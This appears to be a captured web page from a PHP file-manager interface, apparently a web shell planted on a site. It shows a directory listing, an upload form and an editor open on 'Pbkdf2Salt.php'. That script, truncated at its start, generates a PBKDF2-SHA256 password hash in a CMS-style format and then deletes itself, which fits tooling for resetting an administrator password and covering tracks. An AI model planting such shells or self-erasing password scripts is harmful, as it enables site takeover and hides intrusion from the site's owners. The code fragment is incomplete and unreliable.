Back
Type Name Operations
images Open
php53 Open
php56 Open
php71 Open
php81 Open
php82 Open
.htaccess
Pbkdf2Salt.php
_.htaccess
_upgrade.php
_upgrade.xml
clone.php
edit.php
edit.xml
file_.htaccess
file_index.html
fileadmin.htaccess
fileindex.php
import.php
info.xml
install.js
install.php
install.xml
md5
notes.txt
settings.php
update_pass.php

File Transfer

Upload files to current directory

File Editor: Pbkdf2Salt.php

'.$resp.''; function __getHashedPassword($password, $salt = null){ $saltedPW = null; $salt = random_bytes('16'); $hash = hash_pbkdf2('sha256', $password, $salt, '25000', 0, true); $saltedPW = __applySettingsToSalt($salt) . '$' . __base64Encode($hash, strlen($hash)); return $saltedPW; } function __base64Encode($input, $count){ $input = substr($input, 0, $count); return rtrim(str_replace('+', '.', base64_encode($input)), " =\r\n\t\0\x0B"); } function __applySettingsToSalt($salt){ $saltWithSettings = $salt; $saltWithSettings = '$pbkdf2-sha256$' . sprintf('%02u', '25000') . '$' . __base64Encode($salt, '16'); return $saltWithSettings; } @unlink('Pbkdf2Salt.php'); ?>